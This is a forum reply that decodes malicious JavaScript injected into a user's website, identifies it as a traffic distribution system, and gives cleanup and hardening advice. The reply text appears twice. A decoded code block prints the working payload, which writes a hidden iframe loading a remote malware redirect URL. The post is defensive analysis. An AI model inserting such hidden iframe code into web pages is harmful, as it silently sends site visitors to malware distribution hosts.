A
Anonymous
Guest
Ok let me to decode it for you:
It is TDS!
http://www.symantec.com/connect/blogs/web-based-malware-distribution-channels-look-traffic-redistribution-systems
http://sucuri.net/malware/malware-entry-mwiframeenc1560
And finally here is author of this *pack*
http://www.simpletds.com/manual-install
Analysing h***://tds36.4mydomain.com domain theris no route to host.
So,Seems you computer infected with TDS which is unable to update itself and it still inject outdated payload tds36.4mydomain.com .
Here is few things for you:
1) Your computer infected (Rootkit,tro,virii,spyware etc.)
Using this way when you are going to connect to FTP server of your site on fly It injects its "payload" to memory (finally it injects that obfuscated javascript payload to your scripts) and spreads it self + infects your sites)
So,make sure your computer clean,Keep up2date your software,Check for rootkits(In eg: Unhackme)
Use antiviriies,Firewalls,Launch your browser from Sandboxie and so on.
2) This is possible your site is vulnerable(LFI,RFI,SQLI etc)
using that way skriptkiddiez pwn'd your site then infected it (For BOTNET)
3) This is possible your hosting company is not correctly administering(And it is vulnerable to different attacks)
In eg:Outdated software which has a lot of 0days
You need investigate how it appears:
1) You need to analize your site logs(*.tar.gz,*.tar)
It is a complex thing and requires knoledge (especially with Linux)
Anyway,Clean your computer,use software from official sites.
Update your web software,change your mysql,ftp,ssh,cpanel,emails,secret questions,passwords and use unique+random password.
A)Login to your cpanel (after cleanup) then investigate do you have any additional (backdoor) ftp accounts?
B) Look to cron jobs(i see a lot of cron based backdoors)
After clean up of your computer
Download full backup of your site then scan it from antiviruses(IMHO Avira Antivir is best way to do it)
Good Luck)
Code:
//eval if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://tds36.4mydomain.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer(){var f = document.createElement('iframe');f.setAttribute('src','http://tds36.4mydomain.com/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');document.getElementsByTagName('body')[0].appendChild(f);} //document.write (s) <iframe src='http://tds36.4mydomain.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> //jsunpack.url var ss = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://tds36.4mydomain.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function //jsunpack.url var q = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://tds36.4mydomain.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function //jsunpack.url var newurl = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://tds36.4mydomain.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}functionIt is TDS!
http://www.symantec.com/connect/blogs/web-based-malware-distribution-channels-look-traffic-redistribution-systems
http://sucuri.net/malware/malware-entry-mwiframeenc1560
And finally here is author of this *pack*
http://www.simpletds.com/manual-install
Analysing h***://tds36.4mydomain.com domain theris no route to host.
So,Seems you computer infected with TDS which is unable to update itself and it still inject outdated payload tds36.4mydomain.com .
Here is few things for you:
1) Your computer infected (Rootkit,tro,virii,spyware etc.)
Using this way when you are going to connect to FTP server of your site on fly It injects its "payload" to memory (finally it injects that obfuscated javascript payload to your scripts) and spreads it self + infects your sites)
So,make sure your computer clean,Keep up2date your software,Check for rootkits(In eg: Unhackme)
Use antiviriies,Firewalls,Launch your browser from Sandboxie and so on.
2) This is possible your site is vulnerable(LFI,RFI,SQLI etc)
using that way skriptkiddiez pwn'd your site then infected it (For BOTNET)
3) This is possible your hosting company is not correctly administering(And it is vulnerable to different attacks)
In eg:Outdated software which has a lot of 0days
You need investigate how it appears:
1) You need to analize your site logs(*.tar.gz,*.tar)
It is a complex thing and requires knoledge (especially with Linux)
Anyway,Clean your computer,use software from official sites.
Update your web software,change your mysql,ftp,ssh,cpanel,emails,secret questions,passwords and use unique+random password.
A)Login to your cpanel (after cleanup) then investigate do you have any additional (backdoor) ftp accounts?
B) Look to cron jobs(i see a lot of cron based backdoors)
After clean up of your computer
Download full backup of your site then scan it from antiviruses(IMHO Avira Antivir is best way to do it)
Good Luck)